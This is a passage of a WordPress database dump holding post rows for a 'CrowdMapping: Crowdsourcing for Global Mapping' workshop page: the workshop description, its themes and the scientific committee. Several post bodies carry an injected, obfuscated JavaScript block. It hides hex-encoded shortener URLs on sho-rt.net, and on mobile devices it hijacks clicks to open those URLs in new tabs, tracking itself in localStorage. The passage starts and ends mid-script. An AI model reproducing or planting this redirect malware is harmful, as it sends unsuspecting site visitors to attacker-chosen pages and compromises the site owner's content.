_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','CrowdMapping: Crowdsourcing for Global Mapping','','publish','closed','closed','','crowdmapping-crowdsourcing-for-global-mapping','','','2023-02-05 13:51:44','2023-02-05 13:51:44','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=2697',0,'dt_portfolio','',0),
(2698,1,'2022-10-09 04:02:09','2022-10-09 04:02:09','','CrowdMapping: Crowdsourcing for Global Mapping','','inherit','closed','closed','','2697-revision-v1','','','2022-10-09 04:02:09','2022-10-09 04:02:09','',2697,'https://gsw2023.com/?p=2698',0,'revision','',0),
(2699,1,'2022-10-09 04:05:37','2022-10-09 04:05:37','','ws9','','inherit','open','closed','','ws9','','','2022-10-09 04:05:37','2022-10-09 04:05:37','',2697,'https://gsw2023.com/wp-content/uploads/2022/10/ws9.jpg',0,'attachment','image/jpeg',0),
(2700,1,'2022-10-09 04:26:20','2022-10-09 04:26:20','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2699\" img_size=\"1000x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\">Crowdsourcing techniques have been widely employed to detect and map land surface dynamics, such as land use and land cover, human settlements, buildings, and crisis situations. These techniques are applied at regional and global scales to complement or substitute other specialized and expensive physical sensors aboard satellites, unmanned aerial vehicles, ground vehicles, and robots. This workshop will provide a forum for discussion of recent advances in crowdsourcing techniques for mapping global environments. Our goal is to bring together experts in global mapping who utilize Volunteered Geographic Information (VGI), User-Generated-Content, and Citizen Science to establish a common and sustainable ecosystem that will consolidate multi-disciplinary efforts from researchers and practitioners. CrowdMapping will be a key component of the ISPRS Geospatial Week 2023 hosted by the Arab Academy for Science, Technology and Maritime Transport, alongside other related workshops. Since this will be the first joint workshop of the organising team, we propose to allocate a single whole day of the ISPRS Geospatial Week for oral presentations, poster sessions, and hands-on demos aligned to the CrowdMapping context.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][dt_portfolio_masonry image_border_radius=\"0px\" project_icon_border_width=\"0px\" posts_offset=\"0\" category=\"\"][vc_separator][vc_row_inner][vc_column_inner width=\"1/2\"][bsf-info-box icon_size=\"0\"]<h5style=\"text-align:justify; color:red;\" ><strong>Themes of event:</strong></h5>\n<h6><strong>⦁ Land use and land cover mapping using crowdsourcing</strong><br />\n<strong>⦁ Fusion of multi-source data for land use monitoring and change detection</strong><br />\n<strong>⦁ Integration of VGI and deep learning</strong><br />\n<strong>⦁ Generation and extraction of high-quality training data from VGI</strong><br />\n<strong>⦁ Satellite image analysis using crowdsourcing data for collaborative mapping </strong><br />\n<strong>⦁ Measures, indicators, and evaluation methods of VGI quality</strong><br />\n<strong>⦁ 3D building reconstruction from VGI data</strong><br />\n<strong>⦁ Crowdsourcing-based indoor mapping</strong><br />\n<strong>⦁ Building semantic enrichment using social media data</strong><br />\n<strong>⦁ OpenStreetMap enrichment</strong><br />\n<strong>⦁ Crisis mapping using web enabled crowdsourcing</strong><br />\n<strong>⦁ Case study of VGI and crowdsourcing disaster relief</strong><br />\n<strong>⦁ Automatically mapping human settlements in rural areas</strong><br />\n<strong>⦁ Humanitarian cartography using OpenStreetMap</strong><br />\n<strong>⦁ Unified platform for earth observation using Citizen Science</strong><br />\n<strong>⦁ Extraction of urban functional regions from location-enabled social networks</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/2\"][bsf-info-box icon_size=\"0\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong>Scientific Committee:</strong></h5>\n<h6><strong>⦁ João Porto de Albuquerque, University of Glasgow, UK</strong><br />\n<strong>⦁ Jamal Jokar Arsanjani, Aalborg University, Denmark</strong><br />\n<strong>⦁ Ana Basiri, University of Glasgow, UK</strong><br />\n<strong>⦁ Lucy Bastin, Aston University, UK</strong><br />\n<strong>⦁ Alexander Brenning, Friedrich Schiller University, Germany</strong><br />\n<strong>⦁ Cidália Fonte, Universidade de Coimbra, Portugal</strong><br />\n<strong>⦁ Jukka Krisp, Universität Augsburg, Germany</strong><br />\n<strong>⦁ Pascal Neis, University of Applied Sciences Mainz, Germany</strong><br />\n<strong>⦁ Tessio Novack, University of Warwick, UK</strong><br />\n<strong>⦁ Bernd Resch, University of Salzburg, Austria</strong><br />\n<strong>⦁ Hansi Senaratne, German Aerospace Center(DLR), Germany</strong><br />\n<strong>⦁ Bisheng Yang, Wuhan University, China</strong><br />\n<strong>⦁ Xiaoxiang Zhu, German Aerospace Center(DLR), Germany</strong><br />\n<strong>⦁ Alexlander Zipf, Universität Heidelberg, Germany</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][bsf-info-box][/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','CrowdMapping: Crowdsourcing for Global Mapping','','inherit','closed','closed','','2697-autosave-v1','','','2022-10-09 04:26:20','2022-10-09 04:26:20','',2697,'https://gsw2023.com/?p=2700',0,'revision','',0),
(2701,1,'2022-10-09 04:11:27','2022-10-09 04:11:27','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2699\" img_size=\"1000x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\r\n<h5 style=\"text-align: justify; color: black;\">Crowdsourcing techniques have been widely employed to detect and map land surface dynamics, such as land use and land cover, human settlements, buildings, and crisis situations. These techniques are applied at regional and global scales to complement or substitute other specialized and expensive physical sensors aboard satellites, unmanned aerial vehicles, ground vehicles, and robots. This workshop will provide a forum for discussion of recent advances in crowdsourcing techniques for mapping global environments. Our goal is to bring together experts in global mapping who utilize Volunteered Geographic Information (VGI), User-Generated-Content, and Citizen Science to establish a common and sustainable ecosystem that will consolidate multi-disciplinary efforts from researchers and practitioners. CrowdMapping will be a key component of the ISPRS Geospatial Week 2023 hosted by the Arab Academy for Science, Technology and Maritime Transport, alongside other related workshops. Since this will be the first joint workshop of the organising team, we propose to allocate a single whole day of the ISPRS Geospatial Week for oral presentations, poster sessions, and hands-on demos aligned to the CrowdMapping context.</h5>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 